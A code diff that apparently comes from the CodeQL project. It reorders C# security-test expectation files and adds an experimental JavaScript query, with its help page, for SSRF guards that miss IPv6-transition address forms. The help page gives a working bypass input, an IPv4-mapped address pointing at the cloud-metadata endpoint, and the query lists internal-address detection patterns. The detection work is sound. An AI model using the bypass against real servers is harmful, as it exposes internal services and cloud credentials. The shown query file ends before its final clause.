@@ -20,3 +10,13 @@ nodes | CleartextStorage.cs:95:21:95:29 | access to property Text | semmle.label | access to property Text | | CleartextStorage.cs:96:21:96:29 | access to property Text | semmle.label | access to property Text | subpaths +#select +| CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:15:50:15:59 | access to field accountKey | access to field accountKey | +| CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | call to method GetAccountID | +| CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. 
| CleartextStorage.cs:26:21:26:33 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:94:21:94:33 | access to property Text | access to property Text | +| CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:95:21:95:29 | access to property Text | access to property Text | +| CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:96:21:96:29 | access to property Text | access to property Text | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected index e7724d5d586b..a6c8142e7d94 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected 
@@ -1,7 +1,3 @@ -#select -| Test.cs:18:13:18:17 | access to local variable store | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:18:13:18:17 | access to local variable store | This certificate is added to the root certificate store. | -| Test.cs:28:13:28:17 | access to local variable store | Test.cs:25:31:25:86 | object creation of type X509Store : X509Store | Test.cs:28:13:28:17 | access to local variable store | This certificate is added to the root certificate store. | -| Test.cs:73:13:73:17 | access to local variable store | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | Test.cs:73:13:73:17 | access to local variable store | This certificate is added to the root certificate store. | edges | Test.cs:15:23:15:27 | access to local variable store : X509Store | Test.cs:18:13:18:17 | access to local variable store | provenance | | | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:15:23:15:27 | access to local variable store : X509Store | provenance | | 
@@ -20,3 +16,7 @@ nodes | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | semmle.label | object creation of type X509Store : X509Store | | Test.cs:73:13:73:17 | access to local variable store | semmle.label | access to local variable store | subpaths +#select +| Test.cs:18:13:18:17 | access to local variable store | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:18:13:18:17 | access to local variable store | This certificate is added to the root certificate store. | +| Test.cs:28:13:28:17 | access to local variable store | Test.cs:25:31:25:86 | object creation of type X509Store : X509Store | Test.cs:28:13:28:17 | access to local variable store | This certificate is added to the root certificate store. | +| Test.cs:73:13:73:17 | access to local variable store | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | Test.cs:73:13:73:17 | access to local variable store | This certificate is added to the root certificate store. | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected index 0f5c27f64c1c..83fdf530423a 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected 
@@ -1,7 +1,3 @@ -#select -| InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | Connection string | -| InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" | Connection string | -| InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" | Connection string | edges | InsecureSQLConnection.cs:49:20:49:32 | access to local variable connectString : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | provenance | | | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:49:20:49:32 | access to local variable connectString : String | provenance | | 
@@ -16,3 +12,7 @@ nodes | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | semmle.label | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | semmle.label | access to local variable connectString | subpaths +#select +| InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | Connection string | +| InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" | Connection string | +| InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" | Connection string | 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected index 2d92a0387b8a..417692ff79ef 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected 
@@ -1,9 +1,3 @@ -#select -| ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | access to indexer | -| ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | Private data returned by $@ is written to an external location. 
| ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | access to property Text | edges nodes | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | semmle.label | access to indexer | 
@@ -12,3 +6,9 @@ nodes | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | semmle.label | call to method getTelephone | | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | semmle.label | access to property Text | subpaths +#select +| ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | access to indexer | +| ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | Private data returned by $@ is written to an external location. 
| ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | access to property Text | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected index 299285d97174..7de4c593e25d 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected 
@@ -1,8 +1,8 @@ -#select -| HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:55:30:55:64 | object creation of type SqlConnection | object creation of type SqlConnection | -| HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:57:31:57:64 | object creation of type SqlConnection | object creation of type SqlConnection | edges nodes | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | semmle.label | "Password=12345" | | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | semmle.label | "User Id=12345" | subpaths +#select +| HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:55:30:55:64 | object creation of type SqlConnection | object creation of type SqlConnection | +| HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:57:31:57:64 | object creation of type SqlConnection | object creation of type SqlConnection | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected index 36abe5531f04..f6768445fe8e 100644 
--- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected 
@@ -1,12 +1,3 @@ -#select -| HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | The hard-coded value "myPa55word" flows to $@ which is compared against $@. | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | "myPa55word" | HardcodedCredentials.cs:16:13:16:20 | access to local variable password | access to local variable password | -| HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | HardcodedCredentials.cs:32:19:32:28 | "username" | name | HardcodedCredentials.cs:30:31:44:13 | object creation of type MembershipUser | object creation of type MembershipUser | -| HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | The hard-coded value "myNewPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | newPassword | HardcodedCredentials.cs:46:9:46:54 | call to method ChangePassword | call to method ChangePassword | -| HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | This hard-coded value flows to the $@ parameter in $@. | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | rawData | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | -| HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | The hard-coded value "myPa55word" flows to the $@ parameter in $@. 
| HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | password | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | -| HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | The hard-coded value "myusername" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:31:75:42 | "myusername" | username | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | -| HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | The hard-coded value "mypassword" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | password | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | -| TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | TestHardcodedCredentials.cs:26:19:26:28 | "username" | name | TestHardcodedCredentials.cs:24:31:38:13 | object creation of type MembershipUser | object creation of type MembershipUser | edges | HardcodedCredentials.cs:48:16:48:26 | access to local variable rawCertData : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | provenance | | | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:48:16:48:26 | access to local variable rawCertData : Byte[] | provenance | | 
@@ -24,3 +15,12 @@ nodes | TestHardcodedCredentials.cs:21:45:21:56 | "mypassword" | semmle.label | "mypassword" | | TestHardcodedCredentials.cs:26:19:26:28 | "username" | semmle.label | "username" | subpaths +#select +| HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | The hard-coded value "myPa55word" flows to $@ which is compared against $@. | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | "myPa55word" | HardcodedCredentials.cs:16:13:16:20 | access to local variable password | access to local variable password | +| HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | HardcodedCredentials.cs:32:19:32:28 | "username" | name | HardcodedCredentials.cs:30:31:44:13 | object creation of type MembershipUser | object creation of type MembershipUser | +| HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | The hard-coded value "myNewPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | newPassword | HardcodedCredentials.cs:46:9:46:54 | call to method ChangePassword | call to method ChangePassword | +| HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | This hard-coded value flows to the $@ parameter in $@. 
| HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | rawData | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | +| HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | The hard-coded value "myPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | password | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | +| HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | The hard-coded value "myusername" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:31:75:42 | "myusername" | username | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | +| HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | The hard-coded value "mypassword" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | password | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | +| TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | TestHardcodedCredentials.cs:26:19:26:28 | "username" | name | TestHardcodedCredentials.cs:24:31:38:13 | object creation of type MembershipUser | object creation of type MembershipUser | 
diff --git a/javascript/ql/integration-tests/query-suite/not_included_in_qls.expected b/javascript/ql/integration-tests/query-suite/not_included_in_qls.expected index 46317e8800f2..4eb34a847e2b 100644 --- a/javascript/ql/integration-tests/query-suite/not_included_in_qls.expected +++ b/javascript/ql/integration-tests/query-suite/not_included_in_qls.expected @@ -63,6 +63,7 @@ ql/javascript/ql/src/experimental/Security/CWE-347/decodeJwtWithoutVerificationL ql/javascript/ql/src/experimental/Security/CWE-444/InsecureHttpParser.ql ql/javascript/ql/src/experimental/Security/CWE-522-DecompressionBombs/DecompressionBombs.ql ql/javascript/ql/src/experimental/Security/CWE-918/SSRF.ql +ql/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.ql ql/javascript/ql/src/experimental/StandardLibrary/MultipleArgumentsToSetConstructor.ql ql/javascript/ql/src/experimental/heuristics/ql/src/Security/CWE-020/UntrustedDataToExternalAPI.ql ql/javascript/ql/src/experimental/heuristics/ql/src/Security/CWE-078/CommandInjection.ql diff --git a/javascript/ql/src/change-notes/2026-06-06-ssrf-ipv6-transition-incomplete-guard.md b/javascript/ql/src/change-notes/2026-06-06-ssrf-ipv6-transition-incomplete-guard.md new file mode 100644 index 000000000000..35bd19acf46c --- /dev/null +++ b/javascript/ql/src/change-notes/2026-06-06-ssrf-ipv6-transition-incomplete-guard.md @@ -0,0 +1,4 @@ +--- +category: newQuery +--- +* Added a new experimental query, `javascript/ssrf-ipv6-transition-incomplete-guard`, to detect SSRF host-validation guards that reject private IPv4 ranges but fail to unwrap IPv6-transition forms (IPv4-mapped `::ffff:`, NAT64 `64:ff9b::`, 6to4 `2002::`), allowing the guard to be bypassed by wrapping an internal IPv4 address in a transition literal. 
diff --git a/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.qhelp b/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.qhelp new file mode 100644 index 000000000000..79230285f516 --- /dev/null +++ b/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.qhelp @@ -0,0 +1,59 @@ + + + + +

+ Server-side request forgery (SSRF) guards frequently reject requests to internal + addresses by checking the request host against a denylist of private, loopback and + cloud-metadata IPv4 ranges. When such a guard inspects only the dotted-quad IPv4 form + and never unwraps IPv6-transition representations, it can be bypassed: the host + validator classifies the address as public, but the operating system routes the + connection to the embedded internal IPv4 endpoint. +

+

+ The affected forms include IPv4-mapped IPv6 (::ffff:169.254.169.254), + NAT64 (64:ff9b::a9fe:a9fe) and 6to4 (2002::). A URL such as + http://[::ffff:169.254.169.254]/ passes a dotted-quad denylist unchanged + while still reaching the internal address. +

+
+ + +

+ Normalize the host before validating it: parse the address with a transition-aware + library and unwrap IPv4-mapped, NAT64 and 6to4 forms to their embedded IPv4 address, + then apply the private-range check to the normalized value. Libraries such as + ipaddr.js classify these forms correctly via their range API, and + SSRF-protection libraries such as request-filtering-agent apply the check + after DNS resolution. Validate the resolved address rather than the textual host. +

+
+ + +

+ The following guard rejects private IPv4 ranges using the private-ip + package, which inspects the textual IPv4 form only. An attacker supplies + ::ffff:169.254.169.254, which the guard classifies as public, but the + request still reaches the internal metadata endpoint. +

+ + + +

+ The following guard parses the host with a transition-aware classifier, so the + embedded internal IPv4 address is detected regardless of the transition form used. +

+ + +
+ + + +
  • OWASP: Server-Side Request Forgery.
  • +
  • Common Weakness Enumeration: CWE-918.
  • +
  • Common Weakness Enumeration: CWE-1389.
  • + +
    +
    diff --git a/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.ql b/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.ql new file mode 100644 index 000000000000..14e0766d796b --- /dev/null +++ b/javascript/ql/src/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard.ql 
@@ -0,0 +1,129 @@
+/**
+ * @name SSRF host guard does not reject IPv6-transition forms
+ * @description An SSRF host guard that rejects private or loopback IPv4 ranges but never
+ * unwraps IPv6-transition forms (IPv4-mapped `::ffff:`, NAT64 `64:ff9b::`,
+ * 6to4 `2002::`) can be bypassed by wrapping an internal IPv4 address in a
+ * transition literal, allowing requests to reach internal endpoints.
+ * @kind problem
+ * @problem.severity warning
+ * @id javascript/ssrf-ipv6-transition-incomplete-guard
+ * @tags security
+ * experimental
+ * external/cwe/cwe-918
+ * external/cwe/cwe-1389
+ */
+
+import javascript
+
+/**
+ * Holds if `f` imports a dotted-quad-oriented private-IP guard package whose
+ * classification is performed on the textual IPv4 form and therefore returns
+ * `false` for an internal address wrapped in an IPv6-transition literal.
+ */
+predicate importsHandRolledIpGuard(File f) {
+ exists(DataFlow::SourceNode mod |
+ mod.getFile() = f and
+ mod = DataFlow::moduleImport(["private-ip", "is-ip", "ip", "ip-range-check"])
+ )
+}
+
+/**
+ * Holds if `f` contains a call to an `isPrivate`-style host classifier, the
+ * common name for a hand-rolled SSRF guard.
+ */
+predicate hasIsPrivateCall(File f) {
+ exists(DataFlow::CallNode c |
+ c.getFile() = f and
+ c.getCalleeName().regexpMatch("(?i)^is_?private(ip|address|host)?$")
+ )
+ or
+ exists(DataFlow::MethodCallNode m |
+ m.getFile() = f and
+ m.getMethodName().regexpMatch("(?i)^is_?private(ip|address|host)?$")
+ )
+}
+
+/**
+ * Holds if `f` contains a hand-written RFC 1918, loopback or cloud-metadata IPv4
+ * literal used as a denylist entry.
+ */
+predicate hasRfc1918Literal(File f) {
+ exists(StringLiteral s |
+ s.getFile() = f and
+ s.getValue()
+ .regexpMatch("(?i).*(127\\.0\\.0\\.1|169\\.254\\.169\\.254|10\\.|192\\.168|172\\.1[6-9]|::1|fc00|fd00|metadata\\.google).*")
+ )
+}
+
+/** Holds if `f` carries any hand-rolled, dotted-quad-oriented SSRF guard signal. */
+predicate hasUnsafeGuardSignal(File f) {
+ importsHandRolledIpGuard(f) or
+ hasIsPrivateCall(f) or
+ hasRfc1918Literal(f)
+}
+
+/** Holds if `func` has a name that reads as an SSRF host or URL validator. */
+predicate isSsrfValidatorFunction(Function func) {
+ func.getName()
+ .regexpMatch("(?i).*(validate|check|guard|reject|deny|block|allow|is_?safe|sanitiz)e?_?.*(url|host|ip|address|target|endpoint|webhook|origin).*")
+ or
+ func.getName()
+ .regexpMatch("(?i).*(is_?)?(private|internal|loopback|reserved|external)_?(ip|address|host|url).*")
+ or
+ func.getName().regexpMatch("(?i).*(ssrf|metadata).*")
+}
+
+/**
+ * Holds if `f` imports a maturity-hardened, transition-aware address classifier
+ * or SSRF-protection library that does unwrap IPv6-transition forms.
+ */
+predicate importsSafeClassifier(File f) {
+ exists(DataFlow::SourceNode mod |
+ mod.getFile() = f and
+ mod =
+ DataFlow::moduleImport([
+ "ipaddr.js", "ssrf-req-filter", "request-filtering-agent", "ssrf-agent", "netmask",
+ "ip-cidr", "cidr-matcher", "blocked-at"
+ ])
+ )
+}
+
+/**
+ * Holds if `f` already performs an explicit IPv6-transition unwrap or
+ * canonicalization, so the guard does see the embedded IPv4 address.
+ */
+predicate hasTransitionUnwrap(File f) {
+ exists(StringLiteral s |
+ s.getFile() = f and
+ (
+ s.getValue().matches("%64:ff9b%") or
+ s.getValue().matches("%::ffff%") or
+ s.getValue().matches("%2002:%") or
+ s.getValue().matches("%2001:%")
+ )
+ )
+ or
+ exists(Identifier id |
+ id.getFile() = f and
+ id.getName()
+ .regexpMatch("(?i).*(ipv4mapped|v4mapped|mappedipv4|ipv4inipv6|embeddedipv4|unwrap.*ip|toipv4|canonicaliz|isipv4compat).*")
+ )
+ or
+ exists(DataFlow::MethodCallNode m | m.getFile() = f and m.getMethodName() = ["range", "kind"])
+}
+
